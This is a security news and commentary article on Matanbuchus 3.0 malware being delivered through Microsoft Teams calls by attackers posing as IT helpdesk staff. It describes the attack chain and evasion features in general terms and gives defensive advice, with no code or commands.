Microsoft Teams Used to Spread Dangerous Malware: Matanbuchus 30 Strikes Again

Cybercriminals Now Impersonate IT Helpdesks to Breach Corporate Systems

Hackers have found a new weapon in their arsenal—and it’s hiding in your video calls. Matanbuchus, a stealthy malware-as-a-service (MaaS) platform, has evolved into one of the most dangerous digital threats of 2025. Security researchers have confirmed that cybercriminals are now leveraging Microsoft Teams calls to deliver this malicious software, often impersonating IT helpdesk personnel to trick unsuspecting employees. The latest version, Matanbuchus 3.0, carries powerful upgrades that make it even harder to detect and defend against. Companies using Microsoft Teams without strict access controls are now prime targets for this rapidly spreading malware.

Microsoft Teams Becomes a Malware Delivery Platform

Matanbuchus 3.0 is the latest evolution of a malware loader first spotted on the dark web in 2021, initially sold for \$2,500. It was created to inject malicious payloads directly into system memory, making it extremely hard to trace. In 2022, researchers identified its role in spreading Cobalt Strike beacons during major spam campaigns. Today, Morphisec researchers reveal that Matanbuchus has stepped up its game by exploiting Microsoft Teams, the workplace communication tool used by millions.

Attackers pose as IT helpdesk agents in Microsoft Teams and initiate a video or voice call. They trick users into launching Quick Assist, a built-in Windows remote support tool, giving attackers full control over the device. Once access is granted, the user is instructed to run a PowerShell script that downloads a malicious ZIP file containing the Matanbuchus loader. The malware is deployed using DLL side-loading, a method that bypasses many traditional security defenses.

Matanbuchus 3.0 features new enhancements, including a switch to Salsa20 encryption for its command-and-control (C2) communications and string obfuscation, making it significantly more stealthy. It uses custom syscalls to avoid Windows API detection and employs the MurmurHash3 hashing technique to confuse reverse engineering efforts.

Once installed, it can run PowerShell commands, EXEs, DLLs, shellcode, and other malicious payloads. It collects user and system information such as usernames, domains, OS versions, and whether the user has administrator privileges. The malware even scans for existing antivirus or endpoint detection tools and adjusts its behavior accordingly.

Researchers have declared Matanbuchus 3.0 a sophisticated threat, citing its evasive capabilities, flexible post-infection controls, and increasing popularity among cybercriminals. Indicators of compromise (IOCs), including known malware samples and domains, have been published to aid in detection and prevention.

What Undercode Say:

Sophistication at Its Peak in Malware Engineering

Matanbuchus 3.0 illustrates a troubling trend: the fusion of advanced technical evasion with persuasive social engineering. The attackers are no longer relying solely on backdoors and phishing emails. Instead, they are now integrating themselves into daily workflows—Teams calls, IT conversations, and remote assistance tools—blending in until it’s too late.

The use of Microsoft Teams as an attack vector is a strategic choice. It’s ubiquitous, it’s trusted, and it’s rarely monitored as a threat vector by many security teams. Most employees would never suspect a Teams call as malicious—especially if it appears to come from internal IT. This makes the delivery method not only effective but highly scalable for attackers.

Another alarming aspect is the abuse of Quick Assist, a legitimate Windows utility. Cybercriminals are essentially using built-in features of the OS to execute high-risk actions, bypassing traditional endpoint defenses. This approach underscores a larger problem: attackers are exploiting trust—trust in applications, in IT teams, and in communication platforms.

Matanbuchus 3.0’s technical upgrades make detection significantly harder. The move from RC4 to Salsa20 for obfuscation and encryption improves data security from the attacker’s side while making it harder for defenders to decode traffic. Its anti-sandboxing capabilities and syscall-based API evasion are hallmarks of malware designed to escape both static and dynamic analysis.

Using MurmurHash3 instead of traditional API calls adds another layer of complexity for reverse engineers. This means fewer recognizable patterns and more obfuscated execution paths. These features together indicate that the developers behind Matanbuchus are not just skilled—they are likely operating at a level close to nation-state actors.

From a business security standpoint, this raises significant concerns. It highlights how essential it is for organizations to tighten external access policies, especially in Microsoft Teams. Most enterprises still allow some level of external communication, often for client or vendor meetings. Attackers exploit this trust boundary.

Matanbuchus also adjusts based on the security posture of its victim, adapting its payload execution method depending on the installed AV or EDR tools. That level of context-awareness indicates real-time intelligence feeding into the malware—a feature once reserved for only the most elite threats.

The implications go far beyond malware infection. Matanbuchus serves as a gateway to larger attacks, such as ransomware or data exfiltration campaigns. Once installed, it can easily deploy additional payloads, perform privilege escalation, and even exfiltrate sensitive data.

For security teams, this means incident response plans must evolve. Traditional detection methods won’t cut it. Advanced behavioral analysis, machine learning models, and threat hunting protocols will be necessary to detect and stop Matanbuchus-like threats in real-time.

Matanbuchus’s presence on the dark web as a Malware-as-a-Service also means it is accessible to lower-tier criminals. This democratization of advanced malware creates a larger, more persistent threat surface for businesses globally.

🔍 Fact Checker Results

✅ Microsoft Teams is being actively exploited by Matanbuchus 3.0 operators for initial malware deployment
✅ Morphisec’s detailed analysis confirms the malware’s advanced obfuscation and post-compromise features
❌ No evidence suggests this malware is currently being neutralized at scale by antivirus tools

📊 Prediction

Expect a surge in social engineering-based attacks over Microsoft Teams and similar collaboration platforms in the next 12 months. If current trends continue, Matanbuchus or its variants may become a top 5 malware threat globally. Organizations that delay tightening external access policies and fail to monitor remote support tools will face increased risk of high-impact cyber intrusions.